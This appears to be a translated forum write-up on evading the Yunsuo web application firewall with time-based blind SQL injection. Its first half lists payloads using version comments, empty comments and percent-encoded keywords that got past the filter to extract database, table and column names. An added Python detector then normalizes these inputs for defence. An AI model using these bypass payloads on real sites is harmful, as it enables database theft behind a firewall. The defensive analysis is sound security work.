I searched Xianzhi and found that, surprisingly, there is no article on bypassing Yunsuo. There are plenty of Yunsuo bypass write-ups elsewhere online, but from what I saw the Yunsuo-protected sites in those articles are all gone now, or Yunsuo has since tightened its rules, so I'll just write up a Yunsuo bypass I did recently.
and was not blocked here, so I didn't test it further; order by, as expected, was blocked straight away.
/*!order*//*!by*/1    blocked
/*!40000/*!30000order*//*!40000/*!30000by*/1    not blocked. The 30000 here is a database version number: if the server's version is higher than it, the contents of the comment are executed.
I spent a lot of time here trying to bypass union select and never got past it. If any master has a way around it, please message me privately.... (typing "cry" by hand)
id=2 and length(database())>1    not blocked. From this we can determine the length of the database name.
id= 2 and if(ascii(substr(database(),1,1))>120,1,sleep(7))    blocked
id=2 and if(ascii(substr(database/**/(),1,1))>120,1,sleep/**/(7))    not blocked
id=2 and if(ascii(substr(database/*!()*/,1,1))>120,1,sleep/*!(7)*/)    not blocked
With the payloads above we can extract the database name.
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>96,1,sleep(5))    blocked
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))    blocked
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database/*!()*/ limit 0,1),1,1))>96,1,sleep/*!(5)*/)    blocked
Here I tried removing one piece at a time to see which part was being blocked and eventually found it was select: with select removed it is no longer blocked and the server reports a syntax error instead.
id=2 and if(ascii(substr(( table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))    not blocked
Now to bypass select:
id=2 and if(ascii(substr(( /*!Select*/+table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))    blocked
id=2 and if(ascii(substr((/*!40000/*!30000select*/ table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))    blocked
id=2 and if(ascii(substr((/*!50000select*/table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))    blocked
id=2 and if(ascii(substr((/*!50000%53elect*/table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))    not blocked
With this we can query the table names directly.
Just reuse the last payload above and it gets through for columns as well:
id=2 and if(ascii(substr((/*!50000%53elect*/column_name from information_schema.columns where table_schema=database/**/() and table_name='xxxx' limit 0,1),1,1))>96,1,sleep/**/(5))    not blocked
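From the defender's side, the pattern running through every step above is the same: the rule matched the literal keyword, and the request reached MySQL with that keyword hidden inside a percent-encoded byte, an empty /**/ comment, or a /*!50000 version comment that MySQL executes but a text scanner treats as a comment. The following is an added example, not code from the post and not Yunsuo's engine, showing why a keyword signature misses these inputs and how canonicalizing the parameter the way MySQL's lexer will read it (percent-decode, drop plain comments, unwrap version comments) lets the very same signature fire on all of them. The SAMPLES list is constructed test data re-typed from the payloads above, and its verdict column is only what the author reported, not something this code checks against.

```python
import re
from urllib.parse import unquote

# Constructed test data: the parameter values from the post above, re-typed here,
# each paired with the verdict the author reports (True = Yunsuo blocked it).
SAMPLES = [
    ("/*!order*//*!by*/1", True),
    ("/*!40000/*!30000order*//*!40000/*!30000by*/1", False),
    ("2 and if(ascii(substr(database(),1,1))>120,1,sleep(7))", True),
    ("2 and if(ascii(substr(database/**/(),1,1))>120,1,sleep/**/(7))", False),
    ("2 and if(ascii(substr(database/*!()*/,1,1))>120,1,sleep/*!(7)*/)", False),
    ("2 and if(ascii(substr((/*!50000select*/table_name from information_schema.tables"
     " where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))", True),
    ("2 and if(ascii(substr((/*!50000%53elect*/table_name from information_schema.tables"
     " where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))", False),
]

# A deliberately simple keyword signature: whole-word SQL verbs and a sleep() call.
KEYWORDS = re.compile(r"\b(select|union|order\s+by|sleep\s*\()", re.I)

# /* ... */ with no '!' after the opener: a plain comment, which MySQL discards.
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)
# /*!50000 or bare /*!: a MySQL version comment, whose body MySQL executes.
VERSION_OPEN = re.compile(r"/\*!\d{0,5}")


def url_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded bytes also resolve."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize(value: str) -> str:
    """Rewrite the parameter the way MySQL's lexer will effectively read it."""
    text = url_decode(value)
    text = PLAIN_COMMENT.sub(" ", text)   # database/**/() -> database ()
    text = VERSION_OPEN.sub(" ", text)    # /*!50000select*/ -> select*/
    text = text.replace("*/", " ")        # drop the closer the step above orphaned
    return re.sub(r"\s+", " ", text).strip().lower()


def naive_match(value: str) -> bool:
    """Signature applied to the raw value, as a rule without normalization would."""
    return KEYWORDS.search(value) is not None


def normalized_match(value: str) -> bool:
    """The same signature applied after normalization."""
    return KEYWORDS.search(normalize(value)) is not None


def evaluate(samples=SAMPLES):
    """Return (value, author_verdict, naive_hit, normalized_hit) for each sample."""
    return [(v, blocked, naive_match(v), normalized_match(v)) for v, blocked in samples]


if __name__ == "__main__":
    for value, blocked, naive, norm in evaluate():
        print(f"yunsuo_blocked={blocked!s:<5} naive={naive!s:<5} "
              f"normalized={norm!s:<5} {normalize(value)[:50]}")
```

Run as-is, the raw signature fires on only one of the seven values (the plain sleep(7) case), while the normalized form fires on all seven, including the two nested /*!40000/*!30000 variants and the %53elect one. The signature itself never changed; what changed is that the detector now reads the parameter the way the backend parser does, which is the general lesson from this post. Keep the decode loop bounded and model the specific database's comment syntax rather than a generic one, and treat this as a detection layer on top of parameterized queries, where a select in a parameter is data and never reaches the parser as code.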